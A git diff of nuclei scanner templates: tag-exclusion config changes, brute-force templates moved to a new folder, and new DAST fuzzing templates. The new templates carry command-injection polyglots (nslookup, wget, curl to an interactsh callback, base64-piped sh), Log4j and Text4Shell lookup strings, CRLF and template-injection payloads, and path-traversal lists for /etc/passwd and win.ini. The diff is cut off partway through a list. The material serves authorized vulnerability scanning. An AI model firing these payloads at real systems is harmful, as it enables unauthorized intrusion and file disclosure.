diff --git a/.nuclei-ignore b/.nuclei-ignore index 4714e3b0df..760f8543d0 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -2,7 +2,7 @@ # ==================================== # # This is default list of tags and files to excluded from default nuclei scan. -# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion +# More details - https://docs.projectdiscovery.io/tools/nuclei/running#template-exclusion # # ============ DO NOT EDIT ============ # Automatically updated by nuclei on execution from nuclei-templates @@ -13,10 +13,8 @@ # unless asked for by the user. tags: - - "fuzz" - "dos" - "local" - - "brute-force" - "bruteforce" - "phishing" diff --git a/config/bugbounty.yml b/config/bugbounty.yml index b75b98dc83..5100e5a49f 100644 --- a/config/bugbounty.yml +++ b/config/bugbounty.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - bruteforce - creds-stuffing - token-spray - osint \ No newline at end of file diff --git a/config/pentest.yml b/config/pentest.yml index dc2466e291..d99c2d14c8 100644 --- a/config/pentest.yml +++ b/config/pentest.yml @@ -15,5 +15,5 @@ type: exclude-tags: - dos - - brute-force + - bruteforce - osint \ No newline at end of file diff --git a/config/recommended.yml b/config/recommended.yml index c3b24db1a9..6cfb5778da 100644 --- a/config/recommended.yml +++ b/config/recommended.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - bruteforce - creds-stuffing - token-spray - osint diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/brute/cache-poisoning-fuzz.yaml similarity index 96% rename from http/fuzzing/cache-poisoning-fuzz.yaml rename to http/fuzzing/brute/cache-poisoning-fuzz.yaml index f76d291382..74037ce125 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/brute/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzzing,bruteforce,cache + tags: bruteforce,cache http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/brute/header-command-injection.yaml similarity index 97% rename from http/fuzzing/header-command-injection.yaml rename to http/fuzzing/brute/header-command-injection.yaml index 550e7fbc9a..ab964c4821 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/brute/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzzing,bruteforce,rce + tags: bruteforce,rce http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/brute/iis-shortname.yaml similarity index 100% rename from http/fuzzing/iis-shortname.yaml rename to http/fuzzing/brute/iis-shortname.yaml diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/brute/linux-lfi-fuzzing.yaml similarity index 99% rename from http/fuzzing/linux-lfi-fuzzing.yaml rename to http/fuzzing/brute/linux-lfi-fuzzing.yaml index f313bfc151..163784b684 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/brute/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: fuzzing,linux,lfi,bruteforce + tags: linux,lfi,bruteforce http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/brute/mdb-database-file.yaml similarity index 100% rename from http/fuzzing/mdb-database-file.yaml rename to http/fuzzing/brute/mdb-database-file.yaml diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/brute/prestashop-module-fuzz.yaml similarity index 89% rename from http/fuzzing/prestashop-module-fuzz.yaml rename to http/fuzzing/brute/prestashop-module-fuzz.yaml index d280c39b77..ba3a105064 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/brute/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzzing,bruteforce,prestashop + tags: bruteforce,prestashop http: - raw: @@ -20,8 +20,6 @@ http: payloads: path: helpers/wordlists/prestashop-modules.txt - threads: 50 - matchers-condition: and matchers: - type: word diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/brute/ssrf-via-proxy.yaml similarity index 100% rename from http/fuzzing/ssrf-via-proxy.yaml rename to http/fuzzing/brute/ssrf-via-proxy.yaml diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/brute/valid-gmail-check.yaml similarity index 95% rename from http/fuzzing/valid-gmail-check.yaml rename to http/fuzzing/brute/valid-gmail-check.yaml index 6d3a9fd0d6..cf50fbfbba 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/brute/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: bruteforce,gmail + tags: gmail self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/brute/waf-fuzz.yaml similarity index 99% rename from http/fuzzing/waf-fuzz.yaml rename to http/fuzzing/brute/waf-fuzz.yaml index 392aa4cad0..d5e2ea23bf 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/brute/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: fuzzing,waf,tech,bruteforce + tags: waf,bruteforce http: - raw: @@ -56,6 +56,7 @@ http: - SELECT * FROM information_schema.tables - SELECT user FROM information_schema.tables AND user = \'test user\'; - UNION SELECT * FROM users WHERE user = \'admin\'; + stop-at-first-match: true matchers: - type: regex diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/brute/wordpress-plugins-detect.yaml similarity index 94% rename from http/fuzzing/wordpress-plugins-detect.yaml rename to http/fuzzing/brute/wordpress-plugins-detect.yaml index ac4f0ded77..ddd8185157 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/brute/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 100563 - tags: fuzzing,bruteforce,wordpress + tags: bruteforce,wordpress http: - raw: @@ -14,7 +14,6 @@ http: GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/brute/wordpress-themes-detect.yaml similarity index 84% rename from http/fuzzing/wordpress-themes-detect.yaml rename to http/fuzzing/brute/wordpress-themes-detect.yaml index 3bb2f31ff5..ece60cfda8 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/brute/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: bruteforce,wordpress,wp + tags: bruteforce,wordpress http: - raw: @@ -16,7 +16,6 @@ http: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 matchers-condition: and matchers: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/brute/wordpress-weak-credentials.yaml similarity index 99% rename from http/fuzzing/wordpress-weak-credentials.yaml rename to http/fuzzing/brute/wordpress-weak-credentials.yaml index 55bff6004d..3321679286 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/brute/wordpress-weak-credentials.yaml @@ -27,10 +27,10 @@ http: log={{users}}&pwd={{passwords}} + attack: clusterbomb payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt - attack: clusterbomb stop-at-first-match: true matchers-condition: and diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/brute/xff-403-bypass.yaml similarity index 97% rename from http/fuzzing/xff-403-bypass.yaml rename to http/fuzzing/brute/xff-403-bypass.yaml index 564e32ff7e..7396b0baf2 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/brute/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzzing,bruteforce + tags: bruteforce http: - raw: diff --git a/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml b/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml new file mode 100644 index 0000000000..050a7d7450 --- /dev/null +++ b/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml @@ -0,0 +1,46 @@ +id: cmdi-blind-oast-polyglot + +info: + name: Blind OS Command Injection + author: pdteam,geeknik + severity: high + description: | + Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. + Successful exploitation could lead to arbitrary command execution on the system. + reference: + - https://portswigger.net/research/hunting-asynchronous-vulnerabilities + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md + tags: cmdi,oast,dast,blind,polyglot,fuzz + +variables: + marker: "{{interactsh-url}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + interaction: + - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" + - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" + - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" + - "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{interaction}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml new file mode 100644 index 0000000000..81033b7014 --- /dev/null +++ b/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-19518 + +info: + name: PHP imap - Remote Command Execution + author: princechaddha + severity: high + description: | + University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. + reference: + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 + - https://www.openwall.com/lists/oss-security/2018/11/22/3 + - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2018-19518 + cwe-id: CWE-88 + metadata: + confidence: tenative + tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + php-imap: + - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" + + fuzzing: + - part: query + fuzz: + - "{{php-imap}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml new file mode 100644 index 0000000000..72b25a4b71 --- /dev/null +++ b/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml @@ -0,0 +1,60 @@ +id: CVE-2021-45046 + +info: + name: Apache Log4j2 - Remote Code Injection + author: princechaddha + severity: critical + description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ + - https://twitter.com/marcioalm/status/1471740771581652995 + - https://logging.apache.org/log4j/2.x/ + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2021-45046 + cwe-id: CWE-502 + metadata: + confidence: tenative + tags: cve,cve2021,rce,oast,log4j,injection,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + log4j: + - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}" + + fuzzing: + - part: query + fuzz: + - "{{log4j}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + + extractors: + - type: regex + part: interactsh_request + group: 2 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml new file mode 100644 index 0000000000..b88ccb9305 --- /dev/null +++ b/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml @@ -0,0 +1,65 @@ +id: CVE-2022-42889 + +info: + name: Text4Shell - Remote Code Execution + author: mordavid,princechaddha + severity: critical + description: | + Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + reference: + - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om + - http://www.openwall.com/lists/oss-security/2022/10/13/4 + - http://www.openwall.com/lists/oss-security/2022/10/18/1 + - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ + - https://github.com/silentsignal/burp-text4shell + remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + metadata: + confidence: tenative + tags: cve,cve2022,rce,oast,text4shell,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + text4shell: + - "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}" + + fuzzing: + - part: query + fuzz: + - "{{text4shell}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: diff --git a/http/fuzzing/dast/cmdi/ruby-open-rce.yaml b/http/fuzzing/dast/cmdi/ruby-open-rce.yaml new file mode 100644 index 0000000000..ef55b0cece --- /dev/null +++ b/http/fuzzing/dast/cmdi/ruby-open-rce.yaml @@ -0,0 +1,36 @@ +id: cmdi-ruby-open-rce + +info: + name: Ruby Kernel#open/URI.open RCE + author: pdteam + severity: high + description: | + Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. + reference: + - https://bishopfox.com/blog/ruby-vulnerabilities-exploits + - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ + tags: cmdi,oast,dast,blind,ruby,rce,fuzz + +variables: + marker: "{{interactsh-url}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + stop-at-first-match: true + payloads: + interaction: + - "|nslookup {{marker}}|curl {{marker}}" + + fuzzing: + - part: query + fuzz: + - "{{interaction}}" + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/http/fuzzing/dast/crlf/cookie-injection.yaml b/http/fuzzing/dast/crlf/cookie-injection.yaml new file mode 100644 index 0000000000..96d4b28bf6 --- /dev/null +++ b/http/fuzzing/dast/crlf/cookie-injection.yaml @@ -0,0 +1,34 @@ +id: cookie-injection + +info: + name: Parameter based cookie injection + author: pdteam + severity: info + reference: + - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ + - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm + tags: reflected,dast,cookie,injection,fuzz + +variables: + first: "cookie_injection" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + reflection: + - "{{first}}" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{reflection}}" + + matchers: + - type: regex + part: header + regex: + - '(?m)(?i)(^set-cookie.*cookie_injection.*)' diff --git a/http/fuzzing/dast/crlf/crlf-injection.yaml b/http/fuzzing/dast/crlf/crlf-injection.yaml new file mode 100644 index 0000000000..d51916027c --- /dev/null +++ b/http/fuzzing/dast/crlf/crlf-injection.yaml @@ -0,0 +1,69 @@ +id: crlf-injection + +info: + name: CRLF Injection + author: pdteam + severity: low + tags: crlf,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + escape: + - "%00" + - "%0a" + - "%0a%20" + - "%0d" + - "%0d%09" + - "%0d%0a" + - "%0d%0a%09" + - "%0d%0a%20" + - "%0d%20" + - "%20" + - "%20%0a" + - "%20%0d" + - "%20%0d%0a" + - "%23%0a" + - "%23%0a%20" + - "%23%0d" + - "%23%0d%0a" + - "%23%oa" + - "%25%30" + - "%25%30%61" + - "%2e%2e%2f%0d%0a" + - "%2f%2e%2e%0d%0a" + - "%2f..%0d%0a" + - "%3f" + - "%3f%0a" + - "%3f%0d" + - "%3f%0d%0a" + - "%e5%98%8a%e5%98%8d" + - "%e5%98%8a%e5%98%8d%0a" + - "%e5%98%8a%e5%98%8d%0d" + - "%e5%98%8a%e5%98%8d%0d%0a" + - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d" + - "%u0000" + - "%u000a" + - "%u000d" + - "\r" + - "\r%20" + - "\r\n" + - "\r\n%20" + - "\r\n\t" + - "\r\t" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{escape}}Set-Cookie:crlfinjection=crlfinjection" + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' diff --git a/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml b/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml new file mode 100644 index 0000000000..d0ed3ea568 --- /dev/null +++ b/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml @@ -0,0 +1,39 @@ +id: angular-client-side-template-injection + +info: + name: Angular Client-side-template-injection + author: theamanrawat + severity: high + reference: + - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ + - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs + tags: angular,csti,dast,fuzz + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + payload: + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{payload}}" + + matchers: + - type: word + part: body + words: + - "{{result}}" diff --git a/http/fuzzing/dast/lfi/lfi-keyed.yaml b/http/fuzzing/dast/lfi/lfi-keyed.yaml new file mode 100644 index 0000000000..494669e21b --- /dev/null +++ b/http/fuzzing/dast/lfi/lfi-keyed.yaml @@ -0,0 +1,118 @@ +id: lfi-keyed + +info: + name: Key LFI Detection + author: pwnhxl + severity: unknown + reference: + - https://owasp.org/www-community/attacks/Unicode_Encoding + tags: dast,pathtraversal,lfi,fuzz + +variables: + fuzz: "../../../../../../../../../../../../../../../" + fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f" + fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f" + fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF" + fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF" + fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../" + fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\' + fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + pathtraversal: + - '{{fuzz}}etc/passwd' + - '{{fuzz}}windows/win.ini' + - '/etc/passwd%00.jpg' + - 'c:/windows/win.ini%00.jpg' + - '{{fuzz}}etc/passwd%00.jpg' + - '{{fuzz}}windows/win.ini%00.jpg' + - '{{fuzz_urlx2_encode}}etc%252fpasswd' + - '{{fuzz_urlx2_encode}}windows%252fwin.ini' + - '{{fuzz_hex_unicode}}etc%u002fpasswd' + - '{{fuzz_hex_unicode}}windows%u002fwin.ini' + - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd' + - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini' + - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd' + - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini' + - '{{fuzz_bypass_replace}}etc/passwd' + - '{{fuzz_bypass_replace}}windows/win.ini' + - '{{fuzz_bypass_replace_windows}}windows\win.ini' + - '{{fuzz_bypass_waf_regx}}etc/passwd' + - '{{fuzz_bypass_waf_regx}}windows/win.ini' + - './web.config' + - '../web.config' + - '../../web.config' + - './WEB-INF/web.xml' + - '../WEB-INF/web.xml' + - '../../WEB-INF/web.xml' + + fuzzing: + - part: query + mode: single + keys: + - cat + - dir + - action + - board + - date + - detail + - file + - download + - path + - folder + - prefix + - include + - page + - inc + - locate + - show + - doc + - site + - type + - view + - content + - document + - layout + - mod + - conf + - url + - img + - image + - images + fuzz: + - "{{pathtraversal}}" + + - part: query + mode: single + values: + - "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$" + fuzz: + - "{{pathtraversal}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - '()' + + - type: regex + part: body + regex: + - '()' diff --git a/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml b/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml new file mode 100644 index 0000000000..7d66c21d9e --- /dev/null +++ b/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml @@ -0,0 +1,78 @@ +id: linux-lfi-fuzz + +info: + name: Local File Inclusion - Linux + author: DhiyaneshDK + severity: high + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + tags: lfi,dast,linux,fuzz + +http: + - method: GET + path: + - '{{BaseURL}}' + + payloads: + nix_fuzz: + - '/etc/passwd' + - '../../etc/passwd' + - '../../../etc/passwd' + - '/../../../../etc/passwd' + - '../../../../../../../../../etc/passwd' + - '../../../../../../../../etc/passwd' + - '../../../../../../../etc/passwd' + - '../../../../../../etc/passwd' + - '../../../../../etc/passwd' + - '../../../../etc/passwd' + - '../../../etc/passwd' + - '../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd' + - '/../../../../../../../../../../etc/passwd^^' + - '/../../../../../../../../../../etc/passwd' + - '/./././././././././././etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '/..\../..\../..\../..\../..\../..\../etc/passwd' + - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '%252e%252e%252fetc%252fpasswd' + - '%252e%252e%252fetc%252fpasswd%00' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' + - '....//....//etc/passwd' + - '..///////..////..//////etc/passwd' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' + - '%0a/bin/cat%20/etc/passwd' + - '%00/etc/passwd%00' + - '%00../../../../../../etc/passwd' + - '/../../../../../../../../../../../etc/passwd%00.jpg' + - '/../../../../../../../../../../../etc/passwd%00.html' + - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' + - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '\\'/bin/cat%20/etc/passwd\\'' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{nix_fuzz}}' + + stop-at-first-match: true + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' diff --git a/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml b/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml new file mode 100644 index 0000000000..cf5fd0a082 --- /dev/null +++ b/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml @@ -0,0 +1,71 @@ +id: windows-lfi-fuzz + +info: + name: Local File Inclusion - Windows + author: pussycat0x + severity: high + tags: lfi,windows,dast,fuzz + +http: + - method: GET + path: + - '{{BaseURL}}' + + payloads: + win_fuzz: + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini%00' + - '\WINNT\win.ini' + - '\WINNT\win.ini%00' + - 'windows/win.ini%00' + - '../../windows/win.ini' + - '....//....//windows/win.ini' + - 